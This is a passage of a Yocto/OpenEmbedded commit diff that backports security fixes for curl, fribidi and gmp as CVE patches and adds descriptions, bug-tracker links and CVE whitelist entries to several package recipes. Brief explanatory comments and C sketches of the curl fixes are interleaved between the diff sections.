+ free(clist->path);
+ free(clist->spath);
+ free(clist->expirestr);
+- free(clist->version);
+ free(clist->maxage);
+
+ *clist = *co; /* then store all the new data */
+@@ -1111,9 +1105,6 @@ struct CookieInfo *Curl_cookie_init(struct Curl_easy *data,
+ c = calloc(1, sizeof(struct CookieInfo));
+ if(!c)
+ return NULL; /* failed to get memory */
+- c->filename = strdup(file?file:"none"); /* copy the name just in case */
+- if(!c->filename)
+- goto fail; /* failed to get memory */
+ }
+ else {
+ /* we got an already existing one, use that */
+@@ -1241,7 +1232,6 @@ static struct Cookie *dup_cookie(struct Cookie *src)
+ CLONE(name);
+ CLONE(value);
+ CLONE(maxage);
+- CLONE(version);
+ d->expires = src->expires;
+ d->tailmatch = src->tailmatch;
+ d->secure = src->secure;
+@@ -1457,7 +1447,6 @@ void Curl_cookie_cleanup(struct CookieInfo *c)
+ {
+ if(c) {
+ unsigned int i;
+- free(c->filename);
+ for(i = 0; i < COOKIE_HASH_SIZE; i++)
+ Curl_cookie_freelist(c->cookies[i]);
+ free(c); /* free the base struct as well */
+diff --git a/lib/cookie.h b/lib/cookie.h
+index b3865e601..2e667cda0 100644
+--- a/lib/cookie.h
++++ b/lib/cookie.h
+@@ -36,8 +36,6 @@ struct Cookie {
+ char *expirestr; /* the plain text version */
+ bool tailmatch; /* whether we do tail-matching of the domain name */
+
+- /* RFC 2109 keywords. Version=1 means 2109-compliant cookie sending */
+- char *version; /* Version = <value> */
+ char *maxage; /* Max-Age = <value> */
+
+ bool secure; /* whether the 'secure' keyword was used */
+@@ -54,15 +52,14 @@ struct Cookie {
+ #define COOKIE_PREFIX__SECURE (1<<0)
+ #define COOKIE_PREFIX__HOST (1<<1)
+
+-#define COOKIE_HASH_SIZE 256
++#define COOKIE_HASH_SIZE 63
+
+ struct CookieInfo {
+ /* linked list of cookies we know of */
+ struct Cookie *cookies[COOKIE_HASH_SIZE];
+
+- char *filename; /* file we read from/write to */
+ bool running; /* state info, for cookie adding information */
+- long numcookies; /* number of cookies in the "jar" */
++ int numcookies; /* number of cookies in the "jar" */
+ bool newsession; /* new session, discard session cookies on load */
+ int lastct; /* last creation-time used in the jar */
+ };
+diff --git a/lib/easy.c b/lib/easy.c
+index b648e80c1..cdca0fb03 100644
+--- a/lib/easy.c
++++ b/lib/easy.c
+@@ -840,9 +840,7 @@ struct Curl_easy *curl_easy_duphandle(struct Curl_easy *data)
+ if(data->cookies) {
+ /* If cookies are enabled in the parent handle, we enable them
+ in the clone as well! */
+- outcurl->cookies = Curl_cookie_init(data,
+- data->cookies->filename,
+- outcurl->cookies,
++ outcurl->cookies = Curl_cookie_init(data, NULL, outcurl->cookies,
+ data->set.cookiesession);
+ if(!outcurl->cookies)
+ goto fail;
+--
+2.39.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-46218.patch b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
new file mode 100644
index 0000000000..c9677b6a84
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
@@ -0,0 +1,52 @@
+CVE: CVE-2023-46218
+Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.68.0-1ubuntu2.21.debian.tar.xz upstream https://github.com/curl/curl/commit/2b0994c29a721c91c57 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 2b0994c29a721c91c572cff7808c572a24d251eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 23 Nov 2023 08:15:47 +0100
+Subject: [PATCH] cookie: lowercase the domain names before PSL checks
+
+Reported-by: Harry Sintonen
+
+Closes #12387
+---
+ lib/cookie.c | 24 ++++++++++++++++--------
+ 1 file changed, 16 insertions(+), 8 deletions(-)
+
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -967,15 +967,23 @@ Curl_cookie_add(struct Curl_easy *data,
+ #ifdef USE_LIBPSL
+ /* Check if the domain is a Public Suffix and if yes, ignore the cookie. */
+ if(domain && co->domain && !isip(co->domain)) {
+- const psl_ctx_t *psl = Curl_psl_use(data);
+- int acceptable;
+-
+- if(psl) {
+- acceptable = psl_is_cookie_domain_acceptable(psl, domain, co->domain);
+- Curl_psl_release(data);
++ bool acceptable = FALSE;
++ char lcase[256];
++ char lcookie[256];
++ size_t dlen = strlen(domain);
++ size_t clen = strlen(co->domain);
++ if((dlen < sizeof(lcase)) && (clen < sizeof(lcookie))) {
++ const psl_ctx_t *psl = Curl_psl_use(data);
++ if(psl) {
++ /* the PSL check requires lowercase domain name and pattern */
++ Curl_strntolower(lcase, domain, dlen + 1);
++ Curl_strntolower(lcookie, co->domain, clen + 1);
++ acceptable = psl_is_cookie_domain_acceptable(psl, lcase, lcookie);
++ Curl_psl_release(data);
++ }
++ else
++ acceptable = !bad_domain(domain);
+ }
+- else
+- acceptable = !bad_domain(domain);
+
+ if(!acceptable) {
+ infof(data, "cookie '%s' dropped, domain '%s' must not "
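
The patch copies both the request host and the cookie domain into bounded buffers and lowercases them before the lookup because, as the in-patch comment notes, the PSL check requires lowercase names. A standalone sketch of that bounded lowercase-copy step (the helper here only mimics what Curl_strntolower() is used for):

    #include <ctype.h>
    #include <stdio.h>
    #include <string.h>

    /* bounded lowercase copy into a caller-provided buffer */
    static void lowercase_copy(char *dest, const char *src, size_t n)
    {
      size_t i;
      for(i = 0; i < n && src[i]; i++)
        dest[i] = (char)tolower((unsigned char)src[i]);
      dest[i] = '\0';
    }

    int main(void)
    {
      char lcase[256];
      const char *domain = "Example.COM";

      if(strlen(domain) < sizeof(lcase)) {     /* same bounds check as the patch */
        lowercase_copy(lcase, domain, strlen(domain));
        printf("%s\n", lcase);                 /* example.com, ready for the PSL check */
      }
      return 0;
    }
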
diff --git a/meta/recipes-support/curl/curl/CVE-2024-2398.patch b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
new file mode 100644
index 0000000000..a3840336f0
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
@@ -0,0 +1,88 @@
+Backport of:
+
+From deca8039991886a559b67bcd6701db800a5cf764 Mon Sep 17 00:00:00 2001
+From: Stefan Eissing <stefan@eissing.org>
+Date: Wed, 6 Mar 2024 09:36:08 +0100
+Subject: [PATCH] http2: push headers better cleanup
+
+- provide common cleanup method for push headers
+
+Closes #13054
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2024-2398.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/deca8039991886a559b67bcd6701db800a5cf764]
+CVE: CVE-2024-2398
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/http2.c | 34 +++++++++++++++-------------------
+ 1 file changed, 15 insertions(+), 19 deletions(-)
+
+--- a/lib/http2.c
++++ b/lib/http2.c
+@@ -515,6 +515,15 @@ static struct Curl_easy *duphandle(struc
+ }
+
+
++static void free_push_headers(struct HTTP *stream)
++{
++ size_t i;
++ for(i = 0; i<stream->push_headers_used; i++)
++ free(stream->push_headers[i]);
++ Curl_safefree(stream->push_headers);
++ stream->push_headers_used = 0;
++}
++
+ static int push_promise(struct Curl_easy *data,
+ struct connectdata *conn,
+ const nghttp2_push_promise *frame)
+@@ -528,7 +537,6 @@ static int push_promise(struct Curl_easy
+ struct curl_pushheaders heads;
+ CURLMcode rc;
+ struct http_conn *httpc;
+- size_t i;
+ /* clone the parent */
+ struct Curl_easy *newhandle = duphandle(data);
+ if(!newhandle) {
+@@ -557,11 +565,7 @@ static int push_promise(struct Curl_easy
+ Curl_set_in_callback(data, false);
+
+ /* free the headers again */
+- for(i = 0; i<stream->push_headers_used; i++)
+- free(stream->push_headers[i]);
+- free(stream->push_headers);
+- stream->push_headers = NULL;
+- stream->push_headers_used = 0;
++ free_push_headers(stream);
+
+ if(rv) {
+ /* denied, kill off the new handle again */
+@@ -995,10 +999,10 @@ static int on_header(nghttp2_session *se
+ stream->push_headers_alloc) {
+ char **headp;
+ stream->push_headers_alloc *= 2;
+- headp = Curl_saferealloc(stream->push_headers,
+- stream->push_headers_alloc * sizeof(char *));
++ headp = realloc(stream->push_headers,
++ stream->push_headers_alloc * sizeof(char *));
+ if(!headp) {
+- stream->push_headers = NULL;
++ free_push_headers(stream);
+ return NGHTTP2_ERR_TEMPORAL_CALLBACK_FAILURE;
+ }
+ stream->push_headers = headp;
+@@ -1179,14 +1183,7 @@ void Curl_http2_done(struct Curl_easy *d
+ if(http->header_recvbuf) {
+ Curl_add_buffer_free(&http->header_recvbuf);
+ Curl_add_buffer_free(&http->trailer_recvbuf);
+- if(http->push_headers) {
+- /* if they weren't used and then freed before */
+- for(; http->push_headers_used > 0; --http->push_headers_used) {
+- free(http->push_headers[http->push_headers_used - 1]);
+- }
+- free(http->push_headers);
+- http->push_headers = NULL;
+- }
++ free_push_headers(http);
+ }
+
+ if(!httpc->h2) /* not HTTP/2 ? */
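
free_push_headers() gives the error paths one shared cleanup, most importantly the realloc() failure branch, which previously dropped the array pointer without freeing the individual header strings. A standalone sketch of a growable header array with that full-cleanup failure path (struct and function names invented for illustration):

    #include <stdlib.h>

    struct pushed {
      char **headers;
      size_t used;
      size_t alloc;
    };

    static void free_headers(struct pushed *p)
    {
      size_t i;
      for(i = 0; i < p->used; i++)
        free(p->headers[i]);
      free(p->headers);
      p->headers = NULL;
      p->used = 0;
    }

    static int add_header(struct pushed *p, char *h)
    {
      if(p->used == p->alloc) {
        size_t nalloc = p->alloc ? p->alloc * 2 : 10;
        char **np = realloc(p->headers, nalloc * sizeof(char *));
        if(!np) {
          free_headers(p);   /* full cleanup: elements and array, not just the pointer */
          free(h);
          return -1;
        }
        p->headers = np;
        p->alloc = nalloc;
      }
      p->headers[p->used++] = h;
      return 0;
    }
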
diff --git a/meta/recipes-support/curl/curl_7.69.1.bb b/meta/recipes-support/curl/curl_7.69.1.bb
index 239852db09..2f351d585a 100644
--- a/meta/recipes-support/curl/curl_7.69.1.bb
+++ b/meta/recipes-support/curl/curl_7.69.1.bb
@@ -1,4 +1,8 @@
SUMMARY = "Command line tool and library for client-side URL transfers"
+DESCRIPTION = "It uses URL syntax to transfer data to and from servers. \
+curl is widely used because of its flexibility and ability to complete \
+complex tasks. For example, you can use curl for things like user authentication, \
+HTTP post, SSL connections, proxy support, FTP uploads, and more!"
HOMEPAGE = "http://curl.haxx.se/"
BUGTRACKER = "http://curl.haxx.se/mail/list.cgi?list=curl-tracker"
SECTION = "console/network"
@@ -9,6 +13,52 @@ SRC_URI = "https://curl.haxx.se/download/curl-${PV}.tar.bz2 \
file://0001-replace-krb5-config-with-pkg-config.patch \
file://CVE-2020-8169.patch \
file://CVE-2020-8177.patch \
+ file://CVE-2020-8231.patch \
+ file://CVE-2020-8284.patch \
+ file://CVE-2020-8285.patch \
+ file://CVE-2020-8286.patch \
+ file://CVE-2021-22876.patch \
+ file://CVE-2021-22890.patch \
+ file://CVE-2021-22898.patch \
+ file://CVE-2021-22924.patch \
+ file://CVE-2021-22925.patch \
+ file://CVE-2021-22946-pre1.patch \
+ file://CVE-2021-22946.patch \
+ file://CVE-2021-22947.patch \
+ file://CVE-2022-27776.patch \
+ file://CVE-2022-27775.patch \
+ file://CVE-2022-22576.patch \
+ file://CVE-2022-27774-1.patch \
+ file://CVE-2022-27774-2.patch \
+ file://CVE-2022-27774-3.patch \
+ file://CVE-2022-27774-4.patch \
+ file://CVE-2022-27781.patch \
+ file://CVE-2022-27782-1.patch \
+ file://CVE-2022-27782-2.patch \
+ file://CVE-2022-32206.patch \
+ file://CVE-2022-32207.patch \
+ file://CVE-2022-32208.patch \
+ file://CVE-2022-35252.patch \
+ file://CVE-2022-32221.patch \
+ file://CVE-2022-35260.patch \
+ file://CVE-2022-43552.patch \
+ file://CVE-2023-23916.patch \
+ file://CVE-2023-27534-pre1.patch \
+ file://CVE-2023-27534.patch \
+ file://CVE-2023-27538.patch \
+ file://CVE-2023-27533.patch \
+ file://CVE-2023-27535-pre1.patch \
+ file://CVE-2023-27535.patch \
+ file://CVE-2023-27536.patch \
+ file://CVE-2023-28320.patch \
+ file://CVE-2023-28320-fol1.patch \
+ file://CVE-2023-32001.patch \
+ file://CVE-2023-38545.patch \
+ file://CVE-2023-38546.patch \
+ file://CVE-2023-28321.patch \
+ file://CVE-2023-28322.patch \
+ file://CVE-2023-46218.patch \
+ file://CVE-2024-2398.patch \
"
SRC_URI[md5sum] = "ec5fc263f898a3dfef08e805f1ecca42"
@@ -16,6 +66,15 @@ SRC_URI[sha256sum] = "2ff5e5bd507adf6aa88ff4bbafd4c7af464867ffb688be93b9930717a5
# Curl has used many names over the years...
CVE_PRODUCT = "haxx:curl haxx:libcurl curl:curl curl:libcurl libcurl:libcurl daniel_stenberg:curl"
+CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926 CVE-2021-22945"
+
+# As per link https://security-tracker.debian.org/tracker/CVE-2021-22897
+# and https://ubuntu.com/security/CVE-2021-22897
+# This CVE issue affects Windows only, hence whitelisting this CVE
+CVE_CHECK_WHITELIST += "CVE-2021-22897"
+
+# This CVE reports that Apple had to upgrade curl because of other already reported CVEs
+CVE_CHECK_WHITELIST += "CVE-2023-42915"
inherit autotools pkgconfig binconfig multilib_header
diff --git a/meta/recipes-support/db/db_5.3.28.bb b/meta/recipes-support/db/db_5.3.28.bb
index 318efcb61d..b2ae98f05c 100644
--- a/meta/recipes-support/db/db_5.3.28.bb
+++ b/meta/recipes-support/db/db_5.3.28.bb
@@ -10,11 +10,12 @@
# same system at the same time if really necessary.
SECTION = "libs"
SUMMARY = "Berkeley Database v5"
+DESCRIPTION = "Provides the foundational storage services for your application, no matter how demanding and unique your requirements may seem to be"
HOMEPAGE = "https://www.oracle.com/database/technologies/related/berkeleydb.html"
LICENSE = "Sleepycat"
RCONFLICTS_${PN} = "db3"
-CVE_PRODUCT = "oracle_berkeley_db"
+CVE_PRODUCT = "oracle_berkeley_db berkeley_db"
CVE_VERSION = "11.2.${PV}"
PR = "r1"
diff --git a/meta/recipes-support/debianutils/debianutils_4.9.1.bb b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
index 904c52780f..8603fecbd0 100644
--- a/meta/recipes-support/debianutils/debianutils_4.9.1.bb
+++ b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
@@ -1,4 +1,9 @@
SUMMARY = "Miscellaneous utilities specific to Debian"
+DESCRIPTION = "Provides a number of small utilities which are used \
+primarily by the installation scripts of Debian packages, although \
+you may use them directly. "
+HOMEPAGE = "https://packages.debian.org/sid/debianutils"
+BUGTRACKER = "https://bugs.debian.org/cgi-bin/pkgreport.cgi?pkg=debianutils;dist=unstable"
SECTION = "base"
LICENSE = "GPLv2 & SMAIL_GPL"
LIC_FILES_CHKSUM = "file://debian/copyright;md5=f01a5203d50512fc4830b4332b696a9f"
diff --git a/meta/recipes-support/diffoscope/diffoscope_136.bb b/meta/recipes-support/diffoscope/diffoscope_172.bb
index 3e3e1dfc00..b26713c47f 100644
--- a/meta/recipes-support/diffoscope/diffoscope_136.bb
+++ b/meta/recipes-support/diffoscope/diffoscope_172.bb
@@ -7,12 +7,19 @@ PYPI_PACKAGE = "diffoscope"
inherit pypi setuptools3
-SRC_URI[md5sum] = "c84d8d308a40176ba2f5dc4abdbf6f73"
-SRC_URI[sha256sum] = "0d6486d6eb6e0445ba21fee2e8bdd3a366ce786bfac98e00e5a95038b7815f15"
+SRC_URI[sha256sum] = "5ffe7f38555c6409bc7e7edc277ed77dd78641fe1306fc38d153dbbe445ddea4"
RDEPENDS_${PN} += "binutils vim squashfs-tools python3-libarchive-c python3-magic"
# Dependencies don't build for musl
COMPATIBLE_HOST_libc-musl = 'null'
+do_install_append_class-native() {
+ create_wrapper ${D}${bindir}/diffoscope \
+ MAGIC=${STAGING_DIR_NATIVE}${datadir_native}/misc/magic.mgc \
+ RPM_CONFIGDIR=${STAGING_LIBDIR_NATIVE}/rpm \
+ LD_LIBRARY_PATH=${STAGING_LIBDIR_NATIVE} \
+ RPM_ETCCONFIGDIR=${STAGING_DIR_NATIVE}
+}
+
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
index 1623285fd0..ea34e4c7a3 100644
--- a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
+++ b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
@@ -8,7 +8,7 @@ SECTION = "support"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://COPYING.txt;md5=0c977b18f0a384d03597a517d7d03e32"
-SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix"
+SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "dos2unix-(?P<pver>(\d+(\.\d+)+))"
SRCREV = "0490f0723b1a0851b17343f6164915f3474b5197"
diff --git a/meta/recipes-support/enchant/enchant2_2.2.8.bb b/meta/recipes-support/enchant/enchant2_2.2.8.bb
index 4ddbe55da5..7c624efea3 100644
--- a/meta/recipes-support/enchant/enchant2_2.2.8.bb
+++ b/meta/recipes-support/enchant/enchant2_2.2.8.bb
@@ -1,6 +1,9 @@
SUMMARY = "Enchant Spell checker API Library"
+DESCRIPTION = "A library (and command-line program) that wraps a number of \
+different spelling libraries and programs with a consistent interface."
SECTION = "libs"
HOMEPAGE = "https://abiword.github.io/enchant/"
+BUGTRACKER = "https://github.com/AbiWord/enchant/issues/"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=a916467b91076e631dd8edb7424769c7"
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
new file mode 100644
index 0000000000..8f2c2ade0e
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
@@ -0,0 +1,50 @@
+From ad3a19e6372b1e667128ed1ea2f49919884587e1 Mon Sep 17 00:00:00 2001
+From: Akira TAGOH <akira@tagoh.org>
+Date: Thu, 17 Feb 2022 17:30:12 +0900
+Subject: [PATCH] Fix the stack buffer overflow issue
+
+strlen() could return 0. Without a conditional check for len,
+accessing the S_ pointer with len - 1 may cause a stack buffer overflow.
+
+AddressSanitizer reports this like:
+==1219243==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdce043c1f at pc 0x000000403547 bp 0x7ffdce0
+43b30 sp 0x7ffdce043b28
+READ of size 1 at 0x7ffdce043c1f thread T0
+ #0 0x403546 in main ../bin/fribidi-main.c:393
+ #1 0x7f226804e58f in __libc_start_call_main (/lib64/libc.so.6+0x2d58f)
+ #2 0x7f226804e648 in __libc_start_main_impl (/lib64/libc.so.6+0x2d648)
+ #3 0x4036f4 in _start (/tmp/fribidi/build/bin/fribidi+0x4036f4)
+
+Address 0x7ffdce043c1f is located in stack of thread T0 at offset 63 in frame
+ #0 0x4022bf in main ../bin/fribidi-main.c:193
+
+ This frame has 5 object(s):
+ [32, 36) 'option_index' (line 233)
+ [48, 52) 'base' (line 386)
+ [64, 65064) 'S_' (line 375) <== Memory access at offset 63 underflows this variable
+ [65328, 130328) 'outstring' (line 385)
+ [130592, 390592) 'logical' (line 384)
+
+This fixes https://github.com/fribidi/fribidi/issues/181
+
+CVE: CVE-2022-25308
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/ad3a19e6372b1e667128ed1ea2f49919884587e1]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ bin/fribidi-main.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/bin/fribidi-main.c b/bin/fribidi-main.c
+index 3cf9fe1..3ae4fb6 100644
+--- a/bin/fribidi-main.c
++++ b/bin/fribidi-main.c
+@@ -390,7 +390,7 @@ FRIBIDI_END_IGNORE_DEPRECATIONS
+ S_[sizeof (S_) - 1] = 0;
+ len = strlen (S_);
+ /* chop */
+- if (S_[len - 1] == '\n')
++ if (len > 0 && S_[len - 1] == '\n')
+ {
+ len--;
+ S_[len] = '\0';
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
new file mode 100644
index 0000000000..0efba3d05c
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
@@ -0,0 +1,31 @@
+From f22593b82b5d1668d1997dbccd10a9c31ffea3b3 Mon Sep 17 00:00:00 2001
+From: Dov Grobgeld <dov.grobgeld@gmail.com>
+Date: Fri, 25 Mar 2022 09:09:49 +0300
+Subject: [PATCH] Protected against garbage in the CapRTL encoder
+
+CVE: CVE-2022-25309
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/f22593b82b5d1668d1997dbccd10a9c31ffea3b3]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ lib/fribidi-char-sets-cap-rtl.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/fribidi-char-sets-cap-rtl.c b/lib/fribidi-char-sets-cap-rtl.c
+index b0c0e4a..f74e010 100644
+--- a/lib/fribidi-char-sets-cap-rtl.c
++++ b/lib/fribidi-char-sets-cap-rtl.c
+@@ -232,7 +232,12 @@ fribidi_cap_rtl_to_unicode (
+ }
+ }
+ else
+- us[j++] = caprtl_to_unicode[(int) s[i]];
++ {
++ if ((int)s[i] < 0)
++ us[j++] = '?';
++ else
++ us[j++] = caprtl_to_unicode[(int) s[i]];
++ }
+ }
+
+ return j;
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
new file mode 100644
index 0000000000..d79a82d648
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
@@ -0,0 +1,30 @@
+From 175850b03e1af251d705c1d04b2b9b3c1c06e48f Mon Sep 17 00:00:00 2001
+From: Akira TAGOH <akira@tagoh.org>
+Date: Thu, 17 Feb 2022 19:06:10 +0900
+Subject: [PATCH] Fix SEGV issue in fribidi_remove_bidi_marks
+
+Escape from fribidi_remove_bidi_marks() immediately if str is null.
+
+This fixes https://github.com/fribidi/fribidi/issues/183
+
+CVE: CVE-2022-25310
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/175850b03e1af251d705c1d04b2b9b3c1c06e48f]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ lib/fribidi.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/fribidi.c b/lib/fribidi.c
+index f5da0da..70bdab2 100644
+--- a/lib/fribidi.c
++++ b/lib/fribidi.c
+@@ -74,7 +74,7 @@ fribidi_remove_bidi_marks (
+ fribidi_boolean status = false;
+
+ if UNLIKELY
+- (len == 0)
++ (len == 0 || str == NULL)
+ {
+ status = true;
+ goto out;
diff --git a/meta/recipes-support/fribidi/fribidi_1.0.9.bb b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
index 0654b07dc7..62b7d72812 100644
--- a/meta/recipes-support/fribidi/fribidi_1.0.9.bb
+++ b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
@@ -1,9 +1,18 @@
SUMMARY = "Free Implementation of the Unicode Bidirectional Algorithm"
+DESCRIPTION = "It provides utility functions to aid in the development \
+of interactive editors and widgets that implement BiDi functionality. \
+The BiDi algorithm is a prerequisite for supporting right-to-left scripts such \
+as Hebrew, Arabic, Syriac, and Thaana. "
SECTION = "libs"
+HOMEPAGE = "http://fribidi.org/"
+BUGTRACKER = "https://github.com/fribidi/fribidi/issues"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/v${PV}/${BP}.tar.xz \
+ file://CVE-2022-25308.patch \
+ file://CVE-2022-25309.patch \
+ file://CVE-2022-25310.patch \
"
SRC_URI[md5sum] = "1b767c259c3cd8e0c8496970f63c22dc"
SRC_URI[sha256sum] = "c5e47ea9026fb60da1944da9888b4e0a18854a0e2410bbfe7ad90a054d36e0c7"
diff --git a/meta/recipes-support/gdbm/gdbm_1.18.1.bb b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
index fbb1fe72d7..bfc9ee8f85 100644
--- a/meta/recipes-support/gdbm/gdbm_1.18.1.bb
+++ b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "Key/value database library with extensible hashing"
+DESCRIPTION = "Library of database functions that use extensible hashing \
+and work similarly to the standard UNIX dbm. These routines are provided \
+to a programmer needing to create and manipulate a hashed database."
HOMEPAGE = "http://www.gnu.org/software/gdbm/"
SECTION = "libs"
LICENSE = "GPLv3"
diff --git a/meta/recipes-support/gmp/gmp/cve-2021-43618.patch b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
new file mode 100644
index 0000000000..095fb21eaa
--- /dev/null
+++ b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
@@ -0,0 +1,27 @@
+CVE: CVE-2021-43618
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+# HG changeset patch
+# User Marco Bodrato <bodrato@mail.dm.unipi.it>
+# Date 1634836009 -7200
+# Node ID 561a9c25298e17bb01896801ff353546c6923dbd
+# Parent e1fd9db13b475209a864577237ea4b9105b3e96e
+mpz/inp_raw.c: Avoid bit size overflows
+
+diff -r e1fd9db13b47 -r 561a9c25298e mpz/inp_raw.c
+--- a/mpz/inp_raw.c Tue Dec 22 23:49:51 2020 +0100
++++ b/mpz/inp_raw.c Thu Oct 21 19:06:49 2021 +0200
+@@ -88,8 +88,11 @@
+
+ abs_csize = ABS (csize);
+
++ if (UNLIKELY (abs_csize > ~(mp_bitcnt_t) 0 / 8))
++ return 0; /* Bit size overflows */
++
+ /* round up to a multiple of limbs */
+- abs_xsize = BITS_TO_LIMBS (abs_csize*8);
++ abs_xsize = BITS_TO_LIMBS ((mp_bitcnt_t) abs_csize * 8);
+
+ if (abs_xsize != 0)
+ {
diff --git a/meta/recipes-support/gmp/gmp_6.2.0.bb b/meta/recipes-support/gmp/gmp_6.2.0.bb
index a19c74fca8..d29b74f829 100644
--- a/meta/recipes-support/gmp/gmp_6.2.0.bb
+++ b/meta/recipes-support/gmp/gmp_6.2.0.bb
@@ -12,6 +12,7 @@ SRC_URI = "https://gmplib.org/download/${BPN}/${BP}${REVISION}.tar.bz2 \
file://use-includedir.patch \
file://0001-Append-the-user-provided-flags-to-the-auto-detected-.patch \
file://0001-confiure.ac-Believe-the-cflags-from-environment.patch \
+ file://cve-2021-43618.patch \
"
SRC_URI[md5sum] = "c24161e0dd44cae78cd5f67193492a21"
SRC_URI[sha256sum] = "f51c99cb114deb21a60075ffb494c1a210eb9d7cb729ed042ddb7de9534451ea"
diff --git a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
index 0defebeb15..19f32e8d1f 100644
--- a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
+++ b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
@@ -1,11 +1,15 @@
SUMMARY = "Test runner for GNOME-style installed tests"
+DESCRIPTION = "Runner provides an execution harness for GNOME installed tests. \
+These tests are useful for verifying the functionality of software as \
+installed and packaged, and complement rather than replace build-time \
+('make check') tests."
HOMEPAGE = "https://wiki.gnome.org/GnomeGoals/InstalledTests"
LICENSE = "LGPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=3bf50002aefd002f49e7bb854063f7e7 \
file://src/gnome-desktop-testing-runner.c;beginline=1;endline=20;md5=7ef3ad9da2ffcf7707dc11151fe007f4"
-SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http"
+SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http;branch=master"
SRCREV = "4decade67b29ad170fcf3de148e41695fc459f48"
DEPENDS = "glib-2.0"
diff --git a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
index 2c204e0245..a0af2d48dc 100644
--- a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
+++ b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
@@ -1,4 +1,4 @@
-From e7ad11cf54475e455fdb84d118e4782961698567 Mon Sep 17 00:00:00 2001
+From abc5c396aaddaef2e6811362e3e0cc0da28c2b34 Mon Sep 17 00:00:00 2001
From: Alexander Kanavin <alex.kanavin@gmail.com>
Date: Mon, 22 Jan 2018 18:00:21 +0200
Subject: [PATCH] configure.ac: use a custom value for the location of
@@ -14,10 +14,10 @@ Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/configure.ac b/configure.ac
-index 919ab31..cd58fdb 100644
+index 64cb8c6..3fe9027 100644
--- a/configure.ac
+++ b/configure.ac
-@@ -1855,7 +1855,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
